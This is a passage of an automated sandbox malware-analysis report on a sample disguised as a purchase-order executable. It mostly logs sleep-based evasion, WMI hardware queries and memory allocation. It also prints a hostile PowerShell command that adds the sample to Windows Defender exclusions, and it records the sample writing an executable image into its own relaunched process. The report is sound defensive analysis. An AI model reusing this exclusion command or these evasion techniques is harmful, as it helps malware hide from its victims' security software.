                  Source: C:\Users\user\Desktop\PO82200487.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\PO82200487.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\PO82200487.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\PO82200487.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\PO82200487.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\PO82200487.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\PO82200487.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\PO82200487.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\PO82200487.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\PO82200487.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\PO82200487.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\PO82200487.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\PO82200487.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\PO82200487.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\PO82200487.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\PO82200487.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\PO82200487.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\PO82200487.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\PO82200487.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\PO82200487.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\PO82200487.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\PO82200487.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\PO82200487.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\PO82200487.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\PO82200487.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\PO82200487.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\PO82200487.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\PO82200487.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\PO82200487.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\PO82200487.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\PO82200487.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\PO82200487.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\PO82200487.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\PO82200487.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\PO82200487.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\PO82200487.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\PO82200487.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\PO82200487.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\PO82200487.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\PO82200487.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\PO82200487.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\PO82200487.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\PO82200487.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\PO82200487.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\PO82200487.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\PO82200487.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\PO82200487.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\PO82200487.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\PO82200487.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

                  Malware Analysis System Evasion

                  barindex
                  Source: Yara matchFile source: Process Memory Space: PO82200487.exe PID: 7580, type: MEMORYSTR
                  Source: C:\Users\user\Desktop\PO82200487.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_NetworkAdapterConfiguration
                  Source: C:\Users\user\Desktop\PO82200487.exeMemory allocated: C30000 memory reserve | memory write watchJump to behavior
                  Source: C:\Users\user\Desktop\PO82200487.exeMemory allocated: 2930000 memory reserve | memory write watchJump to behavior
                  Source: C:\Users\user\Desktop\PO82200487.exeMemory allocated: F50000 memory reserve | memory write watchJump to behavior
                  Source: C:\Users\user\Desktop\PO82200487.exeMemory allocated: 4EF0000 memory reserve | memory write watchJump to behavior
                  Source: C:\Users\user\Desktop\PO82200487.exeMemory allocated: 5EF0000 memory reserve | memory write watchJump to behavior
                  Source: C:\Users\user\Desktop\PO82200487.exeMemory allocated: 6020000 memory reserve | memory write watchJump to behavior
                  Source: C:\Users\user\Desktop\PO82200487.exeMemory allocated: 7020000 memory reserve | memory write watchJump to behavior
                  Source: C:\Users\user\Desktop\PO82200487.exeMemory allocated: A380000 memory reserve | memory write watchJump to behavior
                  Source: C:\Users\user\Desktop\PO82200487.exeMemory allocated: 9B30000 memory reserve | memory write watchJump to behavior
                  Source: C:\Users\user\Desktop\PO82200487.exeMemory allocated: B380000 memory reserve | memory write watchJump to behavior
                  Source: C:\Users\user\Desktop\PO82200487.exeMemory allocated: C380000 memory reserve | memory write watchJump to behavior
                  Source: C:\Users\user\Desktop\PO82200487.exeMemory allocated: 15C0000 memory reserve | memory write watchJump to behavior
                  Source: C:\Users\user\Desktop\PO82200487.exeMemory allocated: 31C0000 memory reserve | memory write watchJump to behavior
                  Source: C:\Users\user\Desktop\PO82200487.exeMemory allocated: 51C0000 memory reserve | memory write watchJump to behavior
                  Source: C:\Users\user\Desktop\PO82200487.exeThread delayed: delay time: 922337203685477Jump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                  Source: C:\Users\user\Desktop\PO82200487.exeThread delayed: delay time: 922337203685477Jump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 6634Jump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 2998Jump to behavior
                  Source: C:\Users\user\Desktop\PO82200487.exeWindow / User API: threadDelayed 2832Jump to behavior
                  Source: C:\Users\user\Desktop\PO82200487.exeWindow / User API: threadDelayed 6948Jump to behavior
                  Source: C:\Users\user\Desktop\PO82200487.exe TID: 7600Thread sleep time: -922337203685477s >= -30000sJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 8012Thread sleep time: -4611686018427385s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\PO82200487.exe TID: 8004Thread sleep count: 2832 > 30Jump to behavior
                  Source: C:\Users\user\Desktop\PO82200487.exe TID: 8020Thread sleep count: 34 > 30Jump to behavior
                  Source: C:\Users\user\Desktop\PO82200487.exe TID: 8020Thread sleep time: -31359464925306218s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\PO82200487.exe TID: 8020Thread sleep time: -100000s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\PO82200487.exe TID: 8020Thread sleep time: -99871s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\PO82200487.exe TID: 8004Thread sleep count: 6948 > 30Jump to behavior
                  Source: C:\Users\user\Desktop\PO82200487.exe TID: 8020Thread sleep time: -99766s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\PO82200487.exe TID: 8020Thread sleep time: -99657s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\PO82200487.exe TID: 8020Thread sleep time: -99532s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\PO82200487.exe TID: 8020Thread sleep time: -99407s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\PO82200487.exe TID: 8020Thread sleep time: -99282s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\PO82200487.exe TID: 8020Thread sleep time: -99129s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\PO82200487.exe TID: 8020Thread sleep time: -98860s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\PO82200487.exe TID: 8020Thread sleep time: -98732s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\PO82200487.exe TID: 8020Thread sleep time: -98583s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\PO82200487.exe TID: 8020Thread sleep time: -98438s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\PO82200487.exe TID: 8020Thread sleep time: -98328s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\PO82200487.exe TID: 8020Thread sleep time: -98219s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\PO82200487.exe TID: 8020Thread sleep time: -98110s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\PO82200487.exe TID: 8020Thread sleep time: -97985s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\PO82200487.exe TID: 8020Thread sleep time: -97860s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\PO82200487.exe TID: 8020Thread sleep time: -97735s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\PO82200487.exe TID: 8020Thread sleep time: -97610s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\PO82200487.exe TID: 8020Thread sleep time: -97485s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\PO82200487.exe TID: 8020Thread sleep time: -97360s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\PO82200487.exe TID: 8020Thread sleep time: -97235s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\PO82200487.exe TID: 8020Thread sleep time: -97110s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\PO82200487.exe TID: 8020Thread sleep time: -96985s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\PO82200487.exe TID: 8020Thread sleep time: -96860s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\PO82200487.exe TID: 8020Thread sleep time: -96735s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\PO82200487.exe TID: 8020Thread sleep time: -96610s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\PO82200487.exe TID: 8020Thread sleep time: -96485s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\PO82200487.exe TID: 8020Thread sleep time: -96360s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\PO82200487.exe TID: 8020Thread sleep time: -96235s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\PO82200487.exe TID: 8020Thread sleep time: -96113s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\PO82200487.exe TID: 8020Thread sleep time: -95955s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\PO82200487.exe TID: 8020Thread sleep time: -95829s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\PO82200487.exe TID: 8020Thread sleep time: -95704s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\PO82200487.exe TID: 8020Thread sleep time: -95579s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\PO82200487.exe TID: 8020Thread sleep time: -95454s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\PO82200487.exe TID: 8020Thread sleep time: -95329s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\PO82200487.exe TID: 8020Thread sleep time: -95204s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\PO82200487.exe TID: 8020Thread sleep time: -95079s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\PO82200487.exe TID: 8020Thread sleep time: -94953s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\PO82200487.exe TID: 8020Thread sleep time: -94844s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\PO82200487.exe TID: 8020Thread sleep time: -94735s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\PO82200487.exe TID: 8020Thread sleep time: -94610s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\PO82200487.exe TID: 8020Thread sleep time: -94485s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\PO82200487.exe TID: 8020Thread sleep time: -94360s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\PO82200487.exe TID: 8020Thread sleep time: -94235s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\PO82200487.exe TID: 8020Thread sleep time: -94110s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\PO82200487.exe TID: 8020Thread sleep time: -93985s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\PO82200487.exe TID: 8020Thread sleep time: -93860s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\PO82200487.exe TID: 8020Thread sleep time: -93735s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\PO82200487.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BaseBoard
                  Source: C:\Users\user\Desktop\PO82200487.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                  Source: C:\Users\user\Desktop\PO82200487.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                  Source: C:\Users\user\Desktop\PO82200487.exeThread delayed: delay time: 922337203685477Jump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                  Source: C:\Users\user\Desktop\PO82200487.exeThread delayed: delay time: 922337203685477Jump to behavior
                  Source: C:\Users\user\Desktop\PO82200487.exeThread delayed: delay time: 100000Jump to behavior
                  Source: C:\Users\user\Desktop\PO82200487.exeThread delayed: delay time: 99871Jump to behavior
                  Source: C:\Users\user\Desktop\PO82200487.exeThread delayed: delay time: 99766Jump to behavior
                  Source: C:\Users\user\Desktop\PO82200487.exeThread delayed: delay time: 99657Jump to behavior
                  Source: C:\Users\user\Desktop\PO82200487.exeThread delayed: delay time: 99532Jump to behavior
                  Source: C:\Users\user\Desktop\PO82200487.exeThread delayed: delay time: 99407Jump to behavior
                  Source: C:\Users\user\Desktop\PO82200487.exeThread delayed: delay time: 99282Jump to behavior
                  Source: C:\Users\user\Desktop\PO82200487.exeThread delayed: delay time: 99129Jump to behavior
                  Source: C:\Users\user\Desktop\PO82200487.exeThread delayed: delay time: 98860Jump to behavior
                  Source: C:\Users\user\Desktop\PO82200487.exeThread delayed: delay time: 98732Jump to behavior
                  Source: C:\Users\user\Desktop\PO82200487.exeThread delayed: delay time: 98583Jump to behavior
                  Source: C:\Users\user\Desktop\PO82200487.exeThread delayed: delay time: 98438Jump to behavior
                  Source: C:\Users\user\Desktop\PO82200487.exeThread delayed: delay time: 98328Jump to behavior
                  Source: C:\Users\user\Desktop\PO82200487.exeThread delayed: delay time: 98219Jump to behavior
                  Source: C:\Users\user\Desktop\PO82200487.exeThread delayed: delay time: 98110Jump to behavior
                  Source: C:\Users\user\Desktop\PO82200487.exeThread delayed: delay time: 97985Jump to behavior
                  Source: C:\Users\user\Desktop\PO82200487.exeThread delayed: delay time: 97860Jump to behavior
                  Source: C:\Users\user\Desktop\PO82200487.exeThread delayed: delay time: 97735Jump to behavior
                  Source: C:\Users\user\Desktop\PO82200487.exeThread delayed: delay time: 97610Jump to behavior
                  Source: C:\Users\user\Desktop\PO82200487.exeThread delayed: delay time: 97485Jump to behavior
                  Source: C:\Users\user\Desktop\PO82200487.exeThread delayed: delay time: 97360Jump to behavior
                  Source: C:\Users\user\Desktop\PO82200487.exeThread delayed: delay time: 97235Jump to behavior
                  Source: C:\Users\user\Desktop\PO82200487.exeThread delayed: delay time: 97110Jump to behavior
                  Source: C:\Users\user\Desktop\PO82200487.exeThread delayed: delay time: 96985Jump to behavior
                  Source: C:\Users\user\Desktop\PO82200487.exeThread delayed: delay time: 96860Jump to behavior
                  Source: C:\Users\user\Desktop\PO82200487.exeThread delayed: delay time: 96735Jump to behavior
                  Source: C:\Users\user\Desktop\PO82200487.exeThread delayed: delay time: 96610Jump to behavior
                  Source: C:\Users\user\Desktop\PO82200487.exeThread delayed: delay time: 96485Jump to behavior
                  Source: C:\Users\user\Desktop\PO82200487.exeThread delayed: delay time: 96360Jump to behavior
                  Source: C:\Users\user\Desktop\PO82200487.exeThread delayed: delay time: 96235Jump to behavior
                  Source: C:\Users\user\Desktop\PO82200487.exeThread delayed: delay time: 96113Jump to behavior
                  Source: C:\Users\user\Desktop\PO82200487.exeThread delayed: delay time: 95955Jump to behavior
                  Source: C:\Users\user\Desktop\PO82200487.exeThread delayed: delay time: 95829Jump to behavior
                  Source: C:\Users\user\Desktop\PO82200487.exeThread delayed: delay time: 95704Jump to behavior
                  Source: C:\Users\user\Desktop\PO82200487.exeThread delayed: delay time: 95579Jump to behavior
                  Source: C:\Users\user\Desktop\PO82200487.exeThread delayed: delay time: 95454Jump to behavior
                  Source: C:\Users\user\Desktop\PO82200487.exeThread delayed: delay time: 95329Jump to behavior
                  Source: C:\Users\user\Desktop\PO82200487.exeThread delayed: delay time: 95204Jump to behavior
                  Source: C:\Users\user\Desktop\PO82200487.exeThread delayed: delay time: 95079Jump to behavior
                  Source: C:\Users\user\Desktop\PO82200487.exeThread delayed: delay time: 94953Jump to behavior
                  Source: C:\Users\user\Desktop\PO82200487.exeThread delayed: delay time: 94844Jump to behavior
                  Source: C:\Users\user\Desktop\PO82200487.exeThread delayed: delay time: 94735Jump to behavior
                  Source: C:\Users\user\Desktop\PO82200487.exeThread delayed: delay time: 94610Jump to behavior
                  Source: C:\Users\user\Desktop\PO82200487.exeThread delayed: delay time: 94485Jump to behavior
                  Source: C:\Users\user\Desktop\PO82200487.exeThread delayed: delay time: 94360Jump to behavior
                  Source: C:\Users\user\Desktop\PO82200487.exeThread delayed: delay time: 94235Jump to behavior
                  Source: C:\Users\user\Desktop\PO82200487.exeThread delayed: delay time: 94110Jump to behavior
                  Source: C:\Users\user\Desktop\PO82200487.exeThread delayed: delay time: 93985Jump to behavior
                  Source: C:\Users\user\Desktop\PO82200487.exeThread delayed: delay time: 93860Jump to behavior
                  Source: C:\Users\user\Desktop\PO82200487.exeThread delayed: delay time: 93735Jump to behavior
                  Source: PO82200487.exe, 00000004.00000002.2568057140.00000000016C3000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information queried: ProcessInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
                  Source: C:\Users\user\Desktop\PO82200487.exeProcess token adjusted: DebugJump to behavior
                  Source: C:\Users\user\Desktop\PO82200487.exeMemory allocated: page read and write | page guardJump to behavior

                  HIPS / PFW / Operating System Protection Evasion

                  barindex
                  Source: C:\Users\user\Desktop\PO82200487.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\PO82200487.exe"
                  Source: C:\Users\user\Desktop\PO82200487.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\PO82200487.exe"Jump to behavior
                  Source: C:\Users\user\Desktop\PO82200487.exeMemory written: C:\Users\user\Desktop\PO82200487.exe base: 400000 value starts with: 4D5AJump to behavior
                  Source: C:\Users\user\Desktop\PO82200487.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\PO82200487.exe"Jump to behavior
                  Source: C:\Users\user\Desktop\PO82200487.exeProcess created: C:\Users\user\Desktop\PO82200487.exe "C:\Users\user\Desktop\PO82200487.exe"Jump to behavior
                  Source: C:\Users\user\Desktop\PO82200487.exeQueries volume information: C:\Users\user\Desktop\PO82200487.exe VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\PO82200487.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\PO82200487.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\PO82200487.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\PO82200487.exeQueries volume information: C:\Windows\Fonts\timesi.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\PO82200487.exeQueries volume information: C:\Windows\Fonts\timesbd.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\PO82200487.exeQueries volume information: C:\Windows\Fonts\timesbi.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\PO82200487.exeQueries volume information: C:\Windows\Fonts\micross.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\PO82200487.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1.cat VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
